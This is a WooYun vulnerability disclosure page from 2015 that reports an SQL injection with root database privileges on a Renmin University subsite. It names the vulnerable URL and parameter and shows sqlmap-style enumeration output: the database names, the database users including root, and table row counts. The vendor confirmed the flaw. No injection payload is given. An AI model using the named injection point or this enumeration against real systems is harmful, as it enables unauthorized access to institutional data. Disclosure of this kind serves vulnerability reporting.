当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0100879

漏洞标题:中国人民大学理工学科建设处分站root权限注入漏洞

相关厂商:中国人民大学

漏洞作者: ago

提交时间:2015-03-13 14:31

修复时间:2015-04-27 14:32

公开时间:2015-04-27 14:32

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:10

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-03-13: 细节已通知厂商并且等待厂商处理中
2015-03-13: 厂商已经确认,细节仅向厂商公开
2015-03-23: 细节向核心白帽子及相关领域专家公开
2015-04-02: 细节向普通白帽子公开
2015-04-12: 细节向实习白帽子公开
2015-04-27: 细节向公众公开

简要描述:

详细说明:

漏洞点
http://se-office.ruc.edu.cn/cn/index.php?do=list&channelid=4094
[*] demo_ysite_client
[*] information_schema
[*] mysql
[*] test
[*] yizincms_new
[*] ysite_host
database management system users [83]:
[*] ''@'ct10000'
[*] ''@'localhost'
[*] 'root'@'127.0.0.1'
[*] 'root'@'ct10000'
[*] 'root'@'localhost'
Database: yizincms_new
+-----------------------------------+---------+
| Table | Entries |
+-----------------------------------+---------+
| yizincms_siteflow | 116355 |
| yizincms_mu_domain_audit | 949 |
| yizincms_en_settings | 574 |
| yizincms_en_member | 469 |
| yizincms_case | 383 |
| yizincms_annex | 380 |
| yizincms_case_fujian_data | 315 |
| yizincms_en_interface | 209 |
| yizincms_en_annex | 91 |
| yizincms_slides | 85 |
| yizincms_comment | 80 |
| yizincms_links | 79 |
| yizincms_privacy | 76 |
| yizincms_model_source | 75 |
| yizincms_en_privacy | 57 |
| yizincms_ag_agent_all | 56 |
| yizincms_wap_settings | 52 |
| yizincms_member_details | 50 |
| yizincms_en_slides | 45 |
| yizincms_wap_en_settings | 39 |
| yizincms_mu_site_level | 33 |
| yizincms_en_links | 31 |
| yizincms_en_member_details | 31 |
| yizincms_ads | 30 |
| yizincms_en_case_fujian_data | 27 |
| yizincms_msg | 27 |
| yizincms_catalog | 26 |
| yizincms_wap_article | 25 |
| yizincms_settings | 24 |
| yizincms_en_comment | 23 |
| yizincms_site_tags | 23 |
| yizincms_case_annex_data | 22 |
| yizincms_en_ads | 22 |
| yizincms_en_case_annex_data | 22 |
| yizincms_en_msg | 22 |
| yizincms_warning_signs | 20 |
| yizincms_en_grade | 18 |
| yizincms_grade | 18 |
| yizincms_comment_reply | 16 |
| yizincms_wap_en_article | 16 |
| yizincms_en_warning_signs | 15 |
| yizincms_ag_msg | 13 |
| yizincms_wap_catalog | 13 |
| yizincms_en_plus | 10 |
| yizincms_plus | 10 |
| yizincms_model_page | 9 |
| yizincms_settplargument | 9 |
| yizincms_wap_links_group | 9 |
| yizincms_slides_group | 8 |
| yizincms_en_case_annex | 7 |
| yizincms_en_settplargument | 6 |
| yizincms_wap_en_links_group | 6 |
| yizincms_catalog_admin | 5 |
| yizincms_en_catalog_admin | 5 |
| yizincms_wap_en_catalog | 5 |
| yizincms_member | 3 |
| yizincms_groups | 2 |
| yizincms_site_material_articleico | 2 |
| yizincms_wap_en_filter | 2 |
| yizincms_wap_filter | 2 |
| yizincms_wap_links | 2 |
| yizincms_en_member_other | 1 |
| yizincms_host_list | 1 |
| yizincms_host_site_list | 1 |
| yizincms_interface | 1 |
| yizincms_member_other | 1 |
| yizincms_mu_config | 1 |
| yizincms_site | 1 |
| yizincms_wap_ads | 1 |
| yizincms_wap_en_ads | 1 |
| yizincms_wap_en_links | 1 |
+-----------------------------------+---------+

漏洞证明:

Database: yizincms_new
+-----------------------------------+---------+
| Table | Entries |
+-----------------------------------+---------+
| yizincms_siteflow | 116355 |
| yizincms_mu_domain_audit | 949 |
| yizincms_en_settings | 574 |
| yizincms_en_member | 469 |
| yizincms_case | 383 |
| yizincms_annex | 380 |
| yizincms_case_fujian_data | 315 |
| yizincms_en_interface | 209 |
| yizincms_en_annex | 91 |
| yizincms_slides | 85 |
| yizincms_comment | 80 |
| yizincms_links | 79 |
| yizincms_privacy | 76 |
| yizincms_model_source | 75 |
| yizincms_en_privacy | 57 |
| yizincms_ag_agent_all | 56 |
| yizincms_wap_settings | 52 |
| yizincms_member_details | 50 |
| yizincms_en_slides | 45 |
| yizincms_wap_en_settings | 39 |
| yizincms_mu_site_level | 33 |
| yizincms_en_links | 31 |
| yizincms_en_member_details | 31 |
| yizincms_ads | 30 |
| yizincms_en_case_fujian_data | 27 |
| yizincms_msg | 27 |
| yizincms_catalog | 26 |
| yizincms_wap_article | 25 |
| yizincms_settings | 24 |
| yizincms_en_comment | 23 |
| yizincms_site_tags | 23 |
| yizincms_case_annex_data | 22 |
| yizincms_en_ads | 22 |
| yizincms_en_case_annex_data | 22 |
| yizincms_en_msg | 22 |
| yizincms_warning_signs | 20 |
| yizincms_en_grade | 18 |
| yizincms_grade | 18 |
| yizincms_comment_reply | 16 |
| yizincms_wap_en_article | 16 |
| yizincms_en_warning_signs | 15 |
| yizincms_ag_msg | 13 |
| yizincms_wap_catalog | 13 |
| yizincms_en_plus | 10 |
| yizincms_plus | 10 |
| yizincms_model_page | 9 |
| yizincms_settplargument | 9 |
| yizincms_wap_links_group | 9 |
| yizincms_slides_group | 8 |
| yizincms_en_case_annex | 7 |
| yizincms_en_settplargument | 6 |
| yizincms_wap_en_links_group | 6 |
| yizincms_catalog_admin | 5 |
| yizincms_en_catalog_admin | 5 |
| yizincms_wap_en_catalog | 5 |
| yizincms_member | 3 |
| yizincms_groups | 2 |
| yizincms_site_material_articleico | 2 |
| yizincms_wap_en_filter | 2 |
| yizincms_wap_filter | 2 |
| yizincms_wap_links | 2 |
| yizincms_en_member_other | 1 |
| yizincms_host_list | 1 |
| yizincms_host_site_list | 1 |
| yizincms_interface | 1 |
| yizincms_member_other | 1 |
| yizincms_mu_config | 1 |
| yizincms_site | 1 |
| yizincms_wap_ads | 1 |
| yizincms_wap_en_ads | 1 |
| yizincms_wap_en_links | 1 |
+-----------------------------------+---------+

修复方案:

过滤

版权声明:转载请注明来源 ago@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:8

确认时间:2015-03-13 16:38

厂商回复:

非常感谢!已通知部门处理!

最新状态:

暂无


漏洞评价:

评论